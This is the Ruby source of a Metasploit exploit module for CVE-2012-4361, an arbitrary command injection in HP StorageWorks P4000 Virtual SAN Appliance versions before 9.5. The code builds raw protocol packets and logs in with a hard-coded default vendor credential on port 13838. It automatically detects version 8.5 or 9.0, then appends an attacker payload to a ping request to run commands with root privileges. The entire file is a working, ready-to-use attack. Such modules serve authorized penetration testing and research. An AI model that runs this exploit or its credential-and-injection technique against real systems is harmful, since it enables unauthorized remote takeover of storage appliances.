Path: blob/master/modules/exploits/multi/misc/hp_vsa_exec.rb
19512 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",15'Description' => %q{16This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on17versions prior to 9.5. By using a default account credential, it is possible18to inject arbitrary commands as part of a ping request via port 13838.19},20'License' => MSF_LICENSE,21'Author' => [22'Nicolas Gregoire', # Discovery, PoC, additional assistance23'sinn3r' # Metasploit module24],25'References' => [26['CVE', '2012-4361'],27['OSVDB', '82087'],28['EDB', '18893'],29['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958'],30['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086'],31['URL', 'http://www.agarri.fr/blog/archives/2012/02/index.html'] # Original Disclosure32],33'Payload' => {34'BadChars' => "/",35'Compat' =>36{37'PayloadType' => 'cmd',38'RequiredCmd' => 'generic perl telnet'39}40},41'DefaultOptions' => {42'EXITFUNC' => 'thread'43},44'Platform' => %w{linux unix},45'Arch' => ARCH_CMD,46'Targets' => [47[ 'Automatic', {} ],48[ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],49[ 'HP VSA 9', { 'Version' => '9.0.0' } ]50],51'Privileged' => true,52'DisclosureDate' => '2011-11-11',53'DefaultTarget' => 0,54'Notes' => {55'Reliability' => UNKNOWN_RELIABILITY,56'Stability' => UNKNOWN_STABILITY,57'SideEffects' => UNKNOWN_SIDE_EFFECTS58}59)60)6162register_options(63[64OptPort.new('RPORT', [true, 'The remote port', 13838])65]66)67end6869def generate_packet(data)70pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"71pkt << [data.length + 1].pack("N*")72pkt << "\x00\x00\x00\x00"73pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"74pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"75pkt << data76pkt << "\x00"7778pkt79end8081def get_target82if target.name !~ /Automatic/83return target84end8586# Login at 8.5.087packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")88print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")89sock.put(packet)90res = sock.get_once91vprint_status(Rex::Text.to_hex_dump(res)) if res92if res and res =~ /OK/ and res =~ /Login/93return targets[1]94end9596# Login at 9.0.097packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")98print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")99sock.put(packet)100res = sock.get_once101vprint_status(Rex::Text.to_hex_dump(res)) if res102if res and res =~ /OK/ and res =~ /Login/103return targets[2]104end105106fail_with(Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")107end108109def exploit110connect111112if target.name =~ /Automatic/113my_target = get_target114print_good("#{rhost}:#{rport} - Target #{my_target.name} found")115else116my_target = target117print_status("#{rhost}:#{rport} Sending login packet")118packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")119sock.put(packet)120res = sock.get_once121vprint_status(Rex::Text.to_hex_dump(res)) if res122end123124# Command execution125print_status("#{rhost}:#{rport} Sending injection")126data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"127data << "64/5/" if my_target.name =~ /9/128packet = generate_packet(data)129sock.put(packet)130res = sock.get_once131vprint_status(Rex::Text.to_hex_dump(res)) if res132133handler134disconnect135end136end137138139